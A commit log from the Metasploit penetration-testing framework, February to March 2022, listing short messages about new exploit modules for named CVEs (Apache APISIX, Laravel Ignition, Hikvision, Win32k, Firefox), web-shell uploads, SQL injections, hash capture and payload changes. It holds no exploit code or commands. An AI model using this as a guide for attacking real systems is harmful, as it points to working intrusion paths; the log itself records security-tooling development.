Heyder Andrade 236efab669 Update documentation
Add referece to CVE-2022-24112
msftidy_docs
2022-03-03 02:20:56 +01:00
Heyder Andrade a0afba45aa Remove unnecessary stuffs 2022-03-03 02:00:51 +01:00
bwatters 5246e9cb7e Add rescue for failed authentication on info -d 2022-03-02 16:41:19 -06:00
bwatters e649fe3f69 Fix some markdown issues, update docs and add arch check for payloads 2022-03-02 16:30:52 -06:00
Metasploit 2793d7d249 automatic module_metadata_base.json update 2022-03-02 16:15:27 -06:00
Spencer McIntyre d60e625746 Land #16254, shodan_search default user-agent
Fixes #16189 and #16223
2022-03-02 16:57:05 -05:00
Heyder Andrade 0d8933d162 Removed else statements from check in favor of implicit return 2022-03-02 22:42:08 +01:00
Heyder Andrade 41236232e2 WIP - add clean up function 2022-03-02 17:47:58 +01:00
Spencer McIntyre 146859dc12 Use bash instead of netcat as a default payload
Bash is more likely to be installed than netcat and therefore should be
more reliable.
2022-03-02 10:41:57 -05:00
bwatters 06e897436c Add Fedora results to docs and some minor final cleanup 2022-03-02 09:12:01 -06:00
Tim W 9d1c919094 Land #16257, add warning for older apktool versions 2022-03-02 10:28:31 +00:00
Brendan Coles ef135a8440 Msf::Payload::Apk: Print warning if apktool version < 2.5.1 2022-03-02 06:31:43 +00:00
Ashley Donaldson cc84b9038d Don't require a spoofing IP if you're not using active poisoning 2022-03-02 15:05:10 +11:00
Ashley Donaldson 4c4b0b4f8c Fix race condition in jobs cleanup that could allow it to clean up twice simultaneously 2022-03-02 14:43:06 +11:00
Ashley Donaldson 6bffa663a9 Don't try to launch UDP services remotely.
Use normal capitalisation when showing service names to users.
2022-03-02 14:00:41 +11:00
Heyder Andrade 7aa9547e05 WIP - improvements on the request body 2022-03-02 01:43:04 +01:00
Ashley Donaldson 75c0951fc9 Track capture jobs by session, and support stopping captures per-session 2022-03-02 09:59:56 +11:00
adfoster-r7 9c1b0d197b Land #16255, Update metasploit-payloads gem to 2.0.77 - Fix issue with kiwi_cmd arguments 2022-03-01 22:31:08 +00:00
Spencer McIntyre fa89295fe3 Update metasploit-payloads gem to 2.0.77 2022-03-01 16:17:45 -05:00
bwatters 58aed837b2 Update docs and options 2022-03-01 14:48:48 -06:00
Heyder Andrade bb2a2e458b shodan_search default user-agent overwirte - fix #16189 and #16223
As the Shodan is checking the UserAgent to decide which content-type it
will deliver, the default user-agent is causing it to reply a html page.
This commit overwrite the default user-agent the the module shodan_search
to 'Wget' that works in on the shodan API.
2022-03-01 21:31:35 +01:00
bwatters 0516badd8e Change the way we cd after new session is created 2022-03-01 14:20:07 -06:00
space-r7 0c3f0e38f7 Land #16228, validate payload size if not encoded 2022-03-01 14:04:01 -06:00
adfoster-r7 9694b9ff1d Add explicit Github action permissions 2022-03-01 19:48:33 +00:00
Ashley Donaldson 7b78431913 Use remote sessions if configured 2022-03-02 06:29:44 +11:00
Heyder Andrade abd03d592e WIP - adding bypass the IP restriction (CVE-2022-24112) 2022-03-01 19:00:59 +01:00
Heyder Andrade ea2b29661f Fix typo 2022-03-01 17:13:20 +01:00
Metasploit 88888ed2af automatic module_metadata_base.json update 2022-03-01 10:12:33 -06:00
adfoster-r7 7be128b9d2 Land #16251, Fix Python Meterpreter race condition when executing subcommands 2022-03-01 15:53:41 +00:00
Jake Baines e19a92e7a6 Fix disclosure date 2022-03-01 07:12:22 -08:00
Spencer McIntyre 5e5c207864 Update metasploit-payloads gem to 2.0.76 2022-03-01 10:01:07 -05:00
Jake Baines fbdb6614bc Initial version of CVE-2021-4191 GitLab user enumeration 2022-03-01 06:57:39 -08:00
sjanusz 869f073a1b Add setg option to log TLV packets to console or file 2022-03-01 12:50:35 +00:00
Heyder Andrade a6d33ea98e Add module documentation 2022-03-01 12:54:17 +01:00
Ashley Donaldson 4f026aee84 Fix bug in two-step validation of parameters 2022-03-01 15:55:30 +11:00
Ashley Donaldson 8dd459edbb Read some config in from a file 2022-03-01 15:29:50 +11:00
Ashley Donaldson 8af5c092dc Add encrypted services and tab completion to capture plugin 2022-03-01 13:51:40 +11:00
Ashley Donaldson 3846e82a8a Rudimentary argument parsing 2022-03-01 11:29:48 +11:00
Ashley Donaldson 6e5413057e Initial work on configuring hash capture plugin 2022-03-01 10:48:47 +11:00
Ashley Donaldson 602a383f69 Combine hash capture functionality into one plugin (proof of concept) 2022-03-01 09:48:38 +11:00
adfoster-r7 ef8e008799 Remove stale gitignore 2022-02-28 21:13:04 +00:00
Metasploit 239308824a automatic module_metadata_base.json update 2022-02-28 14:58:50 -06:00
bwatters 0081811c52 Land #16185, Firefox CVE-2020-26950 use after free browser exploit
Merge branch 'land-16185' into upstream-master
2022-02-28 14:38:23 -06:00
Metasploit 8e32809fcc automatic module_metadata_base.json update 2022-02-28 12:48:53 -06:00
space-r7 0d10409d67 Land #16131, add modern events calendar sqli 2022-02-28 12:27:45 -06:00
sjanusz 04ecb347a4 rjust command output 2022-02-28 18:26:31 +00:00
Heyder Andrade ad7bd6d623 Added Apache APISIX default API Token RCE module
Added module that laverage the default admin API token for Apache APISIX
to add malicious route which leads to the remote LUA code execution
through the script parameter added in the 2.x version.
2022-02-28 18:09:18 +01:00
Simon Janusz 6c19b93840 Land #16225, Add option to ignore loading metasploit during tests
Add option to ignore loading metasploit during tests
2022-02-28 14:22:12 +00:00
Simon Janusz bd1df9109c Land #16224, Ignore reload lib spec helper file
Ignore reload lib spec helper file
2022-02-28 12:23:04 +00:00
Jake Baines 65e16a1a72 Initial implementation of pfSense auth file creation bug (CVE-2021-41282) 2022-02-27 18:12:54 -08:00
Tim W da8dcbb563 Land #16235, fix apk injection for apktool with malformed version string 2022-02-27 07:33:22 +00:00
Brendan Coles 4fe7375341 Msf::Payload::Apk: Fix apktool version check 2022-02-27 05:33:00 +00:00
Tim W 579811418f update documentation with note about Firefox 82.0.1 2022-02-26 12:35:38 +00:00
space-r7 40bb5e2afa correct return val for definition, add module 2022-02-25 18:13:49 -06:00
Metasploit f3228b4af7 automatic module_metadata_base.json update 2022-02-25 16:56:54 -06:00
bwatters ecaf8b1ba9 Land #16204, Hikvision Unauthenticated RCE (CVE-2021-36260)
Merge branch 'land-16204' into upstream-master
2022-02-25 16:37:08 -06:00
Spencer McIntyre 147837e9b6 Validate payload size even when not encoding 2022-02-25 17:21:59 -05:00
Metasploit 0ac48ea147 automatic module_metadata_base.json update 2022-02-25 16:15:27 -06:00
h00die 9799d87ec9 update exploitable plugins 2022-02-25 17:00:34 -05:00
bwatters b69db83398 Land #16202, Add exploit for CVE-2022-21882 (Win32k LPE)
Merge branch 'land-16202' into upstream-master
2022-02-25 15:55:48 -06:00
h00die 2195edbb8d masterstudy privesc 2022-02-25 16:36:47 -05:00
Metasploit 65626bedd4 automatic module_metadata_base.json update 2022-02-25 11:55:20 -06:00
Grant Willcox 217afa0f3b Land #16190, Axis Camera App RCE (No CVE) 2022-02-25 11:35:03 -06:00
Grant Willcox 1e0db45f1d Add small note about ARMLE stager for future travelers 2022-02-25 11:34:31 -06:00
Spencer McIntyre 9f6e3ba543 Set the cached size for adapated payloads 2022-02-25 11:55:48 -05:00
Jake Baines 2bec5c425f Change CheckCode to Appears 2022-02-25 08:32:06 -08:00
adfoster-r7 09129f086d Add option to ignore loading metasploit during tests 2022-02-25 12:59:10 +00:00
adfoster-r7 5ee44bcdb7 Ignore reload lib spec helper file 2022-02-25 12:38:03 +00:00
Jake Baines 1facfe4a2f Alter upload filename. 2022-02-25 02:53:52 -08:00
Jake Baines d055a7d811 Altered some randomization, the json extracted by check, and fixed some wording 2022-02-24 18:48:21 -08:00
Jake Baines 48072b6554 Fix rubcop complaint introduced in suggestion commit 2022-02-24 18:28:38 -08:00
Jake Baines 454eba2438 Apply suggestions from code review
Added changes suggested by @gwillcox-r7

Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2022-02-24 21:25:09 -05:00
space-r7 9c56a9a2bc add more definitions / constants for permissions 2022-02-24 20:20:38 -06:00
Jeffrey Martin 2605997bd9 add some GSoC 2022 seeds 2022-02-24 17:34:00 -06:00
Metasploit ce56878524 automatic module_metadata_base.json update 2022-02-24 16:14:11 -06:00
Grant Willcox a500435080 Land #16182, wordpress Secure Copy COntent Protection and Content Locking Unauthenticated SQLi (CVE-2021-24931) 2022-02-24 15:55:29 -06:00
Grant Willcox 9b53ed5f5c Add final randomization parts before landing 2022-02-24 15:43:21 -06:00
h00die dc5209e412 vnc docs and fixes 2022-02-24 16:42:36 -05:00
Jeffrey Martin abe55c8f91 raise RuntimeError on incomplete or extra data 2022-02-24 14:02:44 -06:00
Grant Willcox 8d080135bb First round of review edits 2022-02-24 13:46:33 -06:00
Metasploit da044a967a Bump version of framework to 6.1.32 2022-02-24 12:07:52 -06:00
Grant Willcox 94ca15686f Fix issue hwereby some sites don't expose the WordPress API under the /index.php/ directory but instead under the root directory. This allows us to expand support for these websites. 2022-02-24 11:39:17 -06:00
bwatters 1e4e146148 Land #16215, Update metasploit payloads to 2.0.75
Merge branch 'land-16215' into upstream-master
2022-02-24 11:00:46 -06:00
Metasploit 64c5595888 automatic module_metadata_base.json update 2022-02-24 10:56:28 -06:00
Spencer McIntyre 544f8e161a Land #16164, Create Module For CVE-2021-42321 2022-02-24 11:36:12 -05:00
Spencer McIntyre 2b0002031d Fix the minimum build number
This particular change looks like a mistake. Build 17134 (v1803) is the
oldest that is supported.
2022-02-24 11:24:20 -05:00
Jake Baines 9f05a7d11a Removed unneeded custom timeout 2022-02-24 08:13:04 -08:00
Spencer McIntyre 6d325933a9 Remove the default payload options 2022-02-24 10:55:38 -05:00
Jake Baines 3739dad470 Updated to use print_bad instead of fail_with for application removal errors. Also included instructions on how to manually remove the application 2022-02-24 07:44:34 -08:00
sjanusz f473c0e3b1 Convert core_enumextcmd and core_loadlib commands to human readable strings 2022-02-24 14:54:21 +00:00
Jake Baines e1616a520f Fixed a couple of typos. Changed a CheckCode. Randomized the replaced tmp file name 2022-02-24 06:38:36 -08:00
Spencer McIntyre 2e32619328 Merge info in the meterpreter module 2022-02-24 09:04:51 -05:00
bwatters 1ea1781ee2 Update metasploit payloads to 2.0.75 2022-02-23 17:27:12 -06:00
Metasploit b2bdd36923 automatic module_metadata_base.json update 2022-02-23 17:25:28 -06:00
Grant Willcox 585b470703 Land #16093, Fix URL refs for various modules and improve tools/modules/module_reference.rb code 2022-02-23 17:04:26 -06:00
Grant Willcox 5f672019ac Add in RuboCop fixes before final land 2022-02-23 16:27:12 -06:00
Grant Willcox cce49f05db Destroyed Mermaid Test Page (markdown) 2022-02-23 15:47:55 -06:00
Grant Willcox 3b1d097f02 Testing if Mermaid is Supported 2022-02-23 15:47:27 -06:00
Spencer McIntyre bad55a858c Add the new adapter payload type 2022-02-23 16:38:57 -05:00
Metasploit 96e1e3b42b automatic module_metadata_base.json update 2022-02-22 18:17:59 -06:00
Grant Willcox 40c3dd68a2 Land #16061 - Add support to retrieve user list from wp-json to wordpress_scanner module 2022-02-22 17:58:02 -06:00
Grant Willcox fddd3f15c2 Fix up code so that it will not block on attempting to delete the configuration on the folder, just in case the configuration doesn't exist in the first place. Instead print a warning and continue. 2022-02-22 17:52:29 -06:00
Metasploit 534336490a automatic module_metadata_base.json update 2022-02-22 12:41:15 -06:00
adfoster-r7 dc301a12bd Land #16156, Authenticated Microweber v1.2.10 Local File Inclusion 2022-02-22 18:20:59 +00:00
Simon Janusz 7b7b5c6914 Land #16197, Fix Meterpreter module tests on Windows host
Fix Meterpreter module tests on Windows host
2022-02-22 14:43:01 +00:00
talhak08 95f47847e2 VHOST compatibility added 2022-02-22 14:21:33 +03:00
Metasploit b7a014a5d2 automatic module_metadata_base.json update 2022-02-21 05:57:12 -06:00
adfoster-r7 5e4f7a1707 Land #16200, fix post/windows/enum_chrome on Chrome > 80 2022-02-21 11:38:47 +00:00
Jake Baines 4cd3563bc7 Initial commit of exploit for CVE-2021-36260 2022-02-19 13:13:24 -08:00
Dhiraj Mishra f6cb434f07 Merge pull request #7 from bwatters-r7/land-16103
Land 16103
2022-02-19 11:18:27 +04:00
space-r7 5fb3dc1d8e add printer create / spooler settings logic 2022-02-18 17:51:24 -06:00
bwatters 9e9ae9a8cc Remove unneeded files 2022-02-18 16:33:39 -06:00
bwatters f311bd4fce Remove duplicate warning 2022-02-18 16:31:35 -06:00
bwatters 3ea032472d Updated exploit with better check method, added OnSessionCmd option
to run a command when a session is bootstrapped, added more
documentation.
2022-02-18 16:30:47 -06:00
Spencer McIntyre 443bf1249a Remove all the old CVE-2021-1732 data 2022-02-18 15:25:39 -05:00
Spencer McIntyre bcd7cb1122 Writeup the module metadata and docs 2022-02-18 15:23:44 -05:00
Spencer McIntyre d92259f868 One exploit for CVE-2021-1732 and CVE-2022-21882 2022-02-18 15:23:38 -05:00
usiegl00 6d94a316cf Add packet fragmentation to ShadowMitmDispatcher
The ShadowMitmDispatcher now supports arbitrary size packets. The
ShadowMitmDispatcher now supports SMB3. The ShadowMitmDispatcher no
longer interferes with existing sessions.
2022-02-18 17:05:37 +09:00
Tim W 526f1be891 run rubocop on enum_chrome.rb 2022-02-18 02:45:09 +00:00
space-r7 0781e90ca2 add struct processing logic 2022-02-17 19:03:32 -06:00
Metasploit eb4969937f Bump version of framework to 6.1.31 2022-02-17 12:10:25 -06:00
adfoster-r7 603c4d67f9 Fix Meterpreter module tests on Windows host 2022-02-17 17:28:58 +00:00
Pedro Ribeiro 92856e739b Fix shellcode so that it works with "0" octets in LHOST IP 2022-02-17 23:06:53 +07:00
Grant Willcox a6da5913f5 Land #16192, Add ServerJang to session notifer to allow sending new session information to WeChat 2022-02-16 23:31:40 -06:00
Grant Willcox 550a625dc7 Major rework to support redirects 2022-02-16 23:12:55 -06:00
Grant Willcox 0ca56600a6 Fix casting issue by ensuring r.ctx_val is cast to a string before it used in a gsub operation. This prevents errors where sometimes the script can crash when r.ctx_val is considered to be a integer due to it containing only numbers and nothing else 2022-02-16 20:05:19 -06:00
Grant Willcox d7b442f782 Fix up MSB code so it will properly check MSB URLs 2022-02-16 19:16:02 -06:00
h00die d5ba1afbec fix URLs not resolving
fix URLs not resolving

add csv export to references

fix URLs not resolving

pdf not pd

missed a url change

remove extra recirectedfrom fields

remove extra file

fix ovftool url accidental replacement
2022-02-16 17:22:40 -06:00
Tim W f5c17a0d00 use LocalAlloc instead of process.open 2022-02-16 21:27:26 +00:00
Tim W 9211838a62 fix #16134, fix post/windows/enum_chrome on Chrome > 80 2022-02-16 21:27:15 +00:00
Grant Willcox 891c33bd99 Final improvements to store captured WordPress usernames as credentials in database 2022-02-16 14:30:46 -06:00
Grant Willcox 2d9edcd22f Remove extra lines, use normalize_url, convert JSON.parse call to using get_json_document instead and update code appropriately. 2022-02-16 11:43:29 -06:00
Tim W 4e5cd8693d add notes section to placate msftidy 2022-02-16 11:48:55 +00:00
Tim W 480c44e9cb refactor DEBUG_EXPLOIT code into mixin 2022-02-16 11:38:04 +00:00
Tim W 90a06a1cb9 fix docs 2022-02-16 08:37:01 +00:00
Tim W 35d122e16d msftidy 2022-02-16 08:35:04 +00:00
Tim W fb53ca0ac2 actually add support for Windows 2022-02-16 08:33:24 +00:00
Tim W 841af2c6e1 add support for Windows 2022-02-16 08:30:07 +00:00
Tim W 11f2c5201d add documentation 2022-02-16 08:19:25 +00:00
Tim W 6e59efc324 fix evil is undefined on exploit failure 2022-02-16 07:52:42 +00:00
Grant Willcox 5a8cf3ea95 Add corrections from review session 2022-02-15 18:49:46 -06:00
Grant Willcox 6700ed7f3c Update module to use built in error handling within send_request_cgi vs doing it ourselves 2022-02-15 18:18:53 -06:00
Metasploit 34ffea9f3c automatic module_metadata_base.json update 2022-02-15 17:32:51 -06:00
bwatters 1086926b2e Land #16159, Add module for CVE-2021-3129
Merge branch 'land-16159' into upstream-master
2022-02-15 17:14:01 -06:00
Metasploit c88151ca8b automatic module_metadata_base.json update 2022-02-15 17:01:16 -06:00
bwatters 0239ef1cc6 Land #16117, Updates for Log4Shell 2022-02-15 16:39:00 -06:00
space-r7 99226f1a5c add definitions for winspool and spoolss libs 2022-02-15 15:51:22 -06:00
Metasploit f51e06e579 automatic module_metadata_base.json update 2022-02-15 13:04:03 -06:00
Grant Willcox f876c1760e Land #16195, Update hp_dataprotector_cmd_exec.rb to support x64 targets 2022-02-15 12:44:13 -06:00
Metasploit fd32195be2 automatic module_metadata_base.json update 2022-02-15 12:23:14 -06:00
Grant Willcox cbf0fe0d5e Land #16193, Remove the deprecated VSS modules 2022-02-15 12:04:40 -06:00
darrenmartyn 604361b59d Update hp_dataprotector_cmd_exec.rb
64 bit payloads
2022-02-15 18:03:13 +00:00
adfoster-r7 beed32baea Land #16194, Bump RubySMB to 3.0.4 2022-02-15 17:47:24 +00:00
Metasploit 9a2be6088d automatic module_metadata_base.json update 2022-02-15 11:41:31 -06:00
Grant Willcox e203548213 Land #16087, Grandstream UCM62xx IP PBX Websocket Blind SQL Injection Credential Dump 2022-02-15 11:11:11 -06:00
Spencer McIntyre 1a3a30e943 Bump RubySMB to 3.0.4
This pulls in a change to fix #wipe_state!
2022-02-15 12:06:24 -05:00
dwelch-r7 b6deabf09f Land #16172, Update replicant pattern to increment refs 2022-02-15 17:04:31 +00:00
Grant Willcox 6e2f81010e Make Exploit::CheckCode messages more explicit when handling JSON data so we know what we are failing on 2022-02-15 10:47:30 -06:00
adfoster-r7 18b4ce8a13 Update replicant pattern to increment refs 2022-02-15 16:08:35 +00:00
Jake Baines 14234e467a Moved to aux/gather. Implemented autocheck. Added failure on websocket error 2022-02-15 06:23:19 -08:00
Spencer McIntyre bd0aba3cca Bump RubySMB to 3.0.3
This pulls in a fix for reading files.
2022-02-15 08:57:05 -05:00
Spencer McIntyre 50d78e035d Remove the deprecated VSS modules 2022-02-15 08:49:11 -05:00
Tim W 2405a040a8 rubocop and msftidy 2022-02-15 09:31:06 +00:00
Heyder Andrade 891387885b Fixed typos
Co-authored-by: Brendan <bwatters@rapid7.com>
2022-02-15 08:47:50 +01:00
Heyder Andrade bbb66eba55 Fixed typos
Co-authored-by: Brendan <bwatters@rapid7.com>
2022-02-15 08:47:26 +01:00
Heyder Andrade acfc7348c3 Fixed typos
Co-authored-by: Brendan <bwatters@rapid7.com>
2022-02-15 08:47:10 +01:00
zha0gongz1 09ee54a152 Added interface ServerJang to send session information to Wechat 2022-02-15 02:46:41 -05:00
Heyder Andrade c935bc6388 Update modules/exploits/multi/php/ignition_laravel_debug_rce.rb
Fix typos

Co-authored-by: Brendan <bwatters@rapid7.com>
2022-02-15 08:46:25 +01:00
Heyder Andrade 2e73469b6b Update modules/exploits/multi/php/ignition_laravel_debug_rce.rb
Fix typos

Co-authored-by: Brendan <bwatters@rapid7.com>
2022-02-15 08:46:02 +01:00
Jake Baines 5ac3330802 Initial commit of Axis camera app install exploit 2022-02-14 17:54:18 -08:00
Jeffrey Martin cb388b0b4c add SMTPDeliver spec
* define smtp_send_recv expectations
2022-02-14 18:48:27 -06:00
Grant Willcox a7ace66b3f Use send_request_cgi and update options to use HttpUsername and HttpPassword accordingly. This simplifies code. Also update documentation accordingly 2022-02-14 18:19:00 -06:00
Grant Willcox c49591cf11 Add in changes to use targets array as per Spencer's suggestion so we can now spawn Meterpreter shells. Also remove ACCOUNT_LOCKOUTS and fix a call that should have been .get_xml_document 2022-02-14 17:38:10 -06:00
Jeffrey Martin af3fa09896 refactor smtp delivery to support continuation
When dealing with SMTP servers the communication needs to flow
a known protocol. To ensure the socket is in the correct state
after a send and receive it needs to be read until a line return
a response code followed by a `space` and additional data and `\r\n`
or the response code immediately followed by `\r\n` is returned.
2022-02-14 16:55:49 -06:00
Grant Willcox c8f63e30cb Fix minor issues from review 2022-02-14 14:15:17 -06:00
Simon Janusz 01bdbdd131 Land #16181, Add Meterpreter compatibility resource file
Add Meterpreter compatibility resource file
2022-02-14 16:33:16 +00:00
Simon Janusz 732bd3a71c Land #16173, Add readline option to msfconsole
Add readline option to msfconsole
2022-02-14 16:11:15 +00:00
Simon Janusz c8a7a14fa2 Land #16184, Bump rex-powershell
Bump rex-powershell
2022-02-14 15:33:00 +00:00
Tim W 098a82a9d0 cleanup and encode shellcode 2022-02-14 11:21:32 +00:00
adfoster-r7 7b63cd36e1 Bump rex-powershell 2022-02-14 11:19:17 +00:00
Tim W 14fbbff00b initial commit of CVE-2020-26950 2022-02-14 10:36:19 +00:00
Tim W e9758f33b5 Land #16175, order the loadpath summary in alphabetical order 2022-02-14 09:52:19 +00:00
alanfoster d45783a5a0 Add readline option to msfconsole 2022-02-13 23:47:08 +00:00
h00die 392ed7e9a8 change wp_modern_events_calendar check method 2022-02-13 15:50:24 -05:00
h00die e1b933e0a8 change wp_registrationmagic check method 2022-02-13 15:40:57 -05:00
h00die 864ce9471f wp_secure_copy sqli 2022-02-13 15:04:17 -05:00
Pedro Ribeiro 5e738309f9 add shellcode comment 2022-02-14 02:24:59 +07:00
Spencer McIntyre 0f46eb12a7 Add a basic python spec file 2022-02-13 13:32:03 -05:00
Spencer McIntyre 683d4ac471 Add support for staged python command payloads 2022-02-13 12:03:08 -05:00
alanfoster 4e6f75e8d9 Add Meterpreter compatibility resource file 2022-02-13 15:53:44 +00:00
Metasploit 0a1aa2b067 automatic module_metadata_base.json update 2022-02-13 06:30:51 -06:00
usiegl00 881805c543 Update ShadowMitmDispatcher fix PacketFu timeout
Setting the timeout to 0 was causing packet capturing issues in
PacketFu. Using cap.stream.each_data instead of cap.next reduces cpu
usage.
2022-02-13 21:24:57 +09:00
Tim W a13ae3882b Land #16174, fix specifying the mode on File.read for ruby 3 on multiple modules 2022-02-13 12:08:13 +00:00
Metasploit 79eab312ff automatic module_metadata_base.json update 2022-02-13 06:04:36 -06:00
Tim W 65453a1bfa Land #16076, add meterpreter session type support to post/osx/gather/hashdump 2022-02-13 11:46:49 +00:00
Tim W 10470f1ed3 Land #16177, fix test/modules/post/test/search on osx 2022-02-13 10:55:40 +00:00
alanfoster 9098709fc3 Update Meterpreter file existence tests for CI environments 2022-02-12 22:45:18 +00:00
alanfoster b1d10bd699 Fix search path date test for osx 2022-02-12 22:23:18 +00:00
alanfoster ec2ae16135 Order loadpath summary output 2022-02-12 21:47:35 +00:00
alanfoster 395ab1d77e Specify mode rb on file reads 2022-02-12 21:39:12 +00:00
Pedro Ribeiro 99e2cfdab4 correct CVE number 2022-02-13 01:15:10 +07:00
Dhiraj Mishra 3f2d6b6c22 adding authors and removing C exploit reference 2022-02-12 11:52:23 +04:00
Tim W d4516278f0 bump metasploit-payloads to 2.0.74 2022-02-12 06:19:14 +00:00
Tim W c2cacffee9 Land #16170, fix java native_arch 2022-02-12 06:13:48 +00:00
Tim W 6b2c7aadfa bump metasploit-payloads to 2.0.73 2022-02-12 06:08:11 +00:00
bwatters 74521c8ced Update check for supported CentOS, Ubuntu, and Debian Targets 2022-02-11 20:30:05 -06:00
Grant Willcox 058bb33458 Merge me. More Rubocop updates 2022-02-11 17:28:16 -06:00
Grant Willcox 1a3f161ec0 Remove extra comments, randomize an additional parameter, update target section with affected versions 2022-02-11 17:26:42 -06:00
Grant Willcox cfa3d15cee Land #16161, Update user agent strings 2022-02-11 16:28:14 -06:00
Grant Willcox 47fea63fdf One more update to address Apple bumping some versions at the very last minute 2022-02-11 15:57:09 -06:00
Grant Willcox 953a4cb5dc Land #16171, Generate links to new docs site 2022-02-11 14:57:44 -06:00
Grant Willcox 862b057277 Fix up RuboCop issues 2022-02-11 14:18:25 -06:00
Grant Willcox 4c1b2478fa Add in exploit and documentation 2022-02-11 13:58:56 -06:00
Metasploit f71bbebc28 automatic module_metadata_base.json update 2022-02-11 12:04:03 -06:00
space-r7 db00991f26 Land #16150, add nagios xi web shell upload 2022-02-11 11:45:06 -06:00
usiegl00 72a0732009 Update ShadowMitmDispatcher to reduce ip lookups
The ShadowMitmDispatcher must be initialized with an interface, mac, and
ip address as keyword arguments. This prevents dispatchers from
retrieving the same network configuration multiple times.
2022-02-11 22:35:40 +09:00
adfoster-r7 f245c9b260 Updated 2017 Roadmap (markdown) 2022-02-11 13:03:43 +00:00
adfoster-r7 40956bf5b1 Generate links to new docs site 2022-02-11 12:55:04 +00:00
sjanusz 2b281dce5c Add support for Java Meterpreter's native_arch 2022-02-11 11:43:35 +00:00
adfoster-r7 c250605722 Land #16038, Add cname to metasploit docs 2022-02-11 10:16:30 +00:00
Pedro Ribeiro 963a8e7b0d add sploit for Cisco RV340 SSL VPN 2022-02-11 16:42:08 +07:00
Jake Baines e1da95243f Always clean up the created job 2022-02-10 17:39:07 -08:00
adfoster-r7 c4c39e97dd Add cname to metasploit docs 2022-02-10 23:46:47 +00:00
Heyder Andrade ca62a05ce1 Clenup and check strategy
- Removed else statements from check in favor of implicit return
- Added comment explaining the check strategy (to be less intrusive)
2022-02-11 00:30:31 +01:00
Heyder Andrade d1764b2e75 Update option name
Update option name from LOGPATH to LOGFILE to become more intuitive.
2022-02-11 00:00:19 +01:00
Heyder Andrade df53a62cc9 Making reason from failures more descriptives
Cases
[x] User defined wrong log file
    [-] Exploit aborted due to failure: unexpected-reply: Log file
/var/www/log.log seems doesn't exit
[x] module doesnt detect the log file
    [-] Log file does not exist /var/www/storage/logs/laravel.log
    [-] Exploit aborted due to failure: bad-config: Log file is
required, however it was defined nor it was not automatically detecte
[x] site doesnt respond with error, module unable to find the log
directoy
    [-] Unable to automatically find the log file. To continue set
LOGPATH manually
    [-] Exploit aborted due to failure: bad-config: Log file is
required, however it was defined nor it was not automatically detected
[x] site with debug mode false
    [-] Exploit aborted due to failure: not-vulnerable: The target is
not exploitable. "set ForceExploit true" to override check result
2022-02-10 23:40:49 +01:00
talhak08 69314786e0 OptString to OptBool 2022-02-10 23:35:55 +03:00
Jeffrey Martin 5bc60f5bf7 clear any additional response on smtp connect
When connecting to an SMTP server after `HELO` and auth
complete there can be additional data sent from the client
that sits in the socket queue. Adding a `get_once` after connection
has settled ensure any pending for extension responses are cleared.
2022-02-10 14:25:05 -06:00
talhak08 c5157935c4 CheckCodes and Failures fixed 2022-02-10 22:30:04 +03:00
Heyder Andrade 719e71648c Change Vulnerable to Appear in the check method
As we can't determine with certainly whether the target is vulnerable the check method should return appear instead of vulnerable.

Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
2022-02-10 20:08:36 +01:00
talhak08 1ad54ba48d The documentation edited and the defanged mode fixed 2022-02-10 21:13:31 +03:00
Metasploit 0ee0e3959d Bump version of framework to 6.1.30 2022-02-10 12:06:14 -06:00
talhak08 76e63d3474 Fixed the defanged mode. 2022-02-10 20:34:03 +03:00
talhak08 22564a5cdc Fixed the typo. 2022-02-10 20:29:19 +03:00
talhak08 e80ebdde66 Fixes according to the recommendations 2022-02-10 20:26:10 +03:00
bwatters 9635fde12d Add support and templates for aarch64 targets 2022-02-10 10:49:02 -06:00
usiegl00 8558f88a14 Update the Shadow Dispatcher for portability
Use PacketFu::Utils.whoami? instead of PacketFu::Utils.default_int to
retrieve the ip address for a network interface. The Exploit class for
the Shadow Dispatcher is now a module.
2022-02-10 22:42:25 +09:00
Grant Willcox 5431d3d0f6 Add in initial check method code 2022-02-09 20:12:41 -06:00
Grant Willcox 425e57b88b Land #16163, Add the ClaimsPrincipal .NET gadget chain 2022-02-09 14:46:38 -06:00
Jake Baines e18492a88a Update modules/exploits/linux/http/nagios_xi_autodiscovery_webshell.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-02-09 15:35:38 -05:00
Heyder Andrade cc52850ff0 Fix coding style offenses. 2022-02-09 21:30:17 +01:00
Heyder Andrade da1bc1f6d1 Change exploit Rank. Add AutoCheck. Remove custom timeout on request cgi. 2022-02-09 21:19:10 +01:00
Spencer McIntyre e6c1d20c5d Add the ClaimsPrincipal .NET gadget chain 2022-02-09 14:38:51 -05:00
Metasploit d33511ffcc automatic module_metadata_base.json update 2022-02-09 13:06:53 -06:00
space-r7 2e2bad0a98 Land #16147, improve ssh_enumusers user list gen 2022-02-09 12:48:05 -06:00
space-r7 47c74a0037 Land #16121, fix rhost exception due to no session 2022-02-09 10:38:34 -06:00
Tim W a50f39ac12 return super if no session 2022-02-09 10:08:02 +00:00
Jake Baines 0a78dd78ec Used suggested method for defining user webshell, used suggested depth configuration, and used vars_get in a couple of places 2022-02-08 18:20:03 -08:00
adfoster-r7 18aab3b918 Land #16160, Don't crash when the hostname can't be determined 2022-02-08 23:04:18 +00:00
Spencer McIntyre 72ca957285 Don't use default values 2022-02-08 17:40:03 -05:00
bwatters d1ba43e4c8 Remove hard-coded values 2022-02-08 16:00:20 -06:00
bwatters 65ebeafacc Use the supplied directory 2022-02-08 16:00:19 -06:00
bwatters c44fb6a9d3 ugly but working no-gcc module 2022-02-08 16:00:19 -06:00
Ashley Donaldson 1f60303772 Updated user agent strings as of 9 Feb 2022 2022-02-09 08:39:05 +11:00
Spencer McIntyre 1fe01087b6 Remove trailing whitespace from command output 2022-02-08 15:37:11 -05:00
Spencer McIntyre 7d9e6c2bb9 Don't crash when the hostname can't be determined
This fixes a framework-level crash when msfconsole initializes and the
HOSTNAME environment variable is not set and the hostname binary is
missing.
2022-02-08 15:14:36 -05:00
Metasploit 4130c61a14 automatic module_metadata_base.json update 2022-02-08 12:48:04 -06:00
space-r7 bed067dda0 Land #16125, add ARCH_CMD for GXV3140 support 2022-02-08 12:24:42 -06:00
Heyder Andrade 6b64c6b393 Add module documentation 2022-02-08 15:29:11 +01:00
Heyder Andrade c7092861e0 Fix the CVE format based on failed tests 2022-02-08 14:38:54 +01:00
Heyder Andrade f1fe6b7c89 Add module to CVE-2021-3129 2022-02-08 14:21:10 +01:00
talhak08 c3a9b9a7c5 Edited the documentation 2022-02-08 04:17:43 +03:00
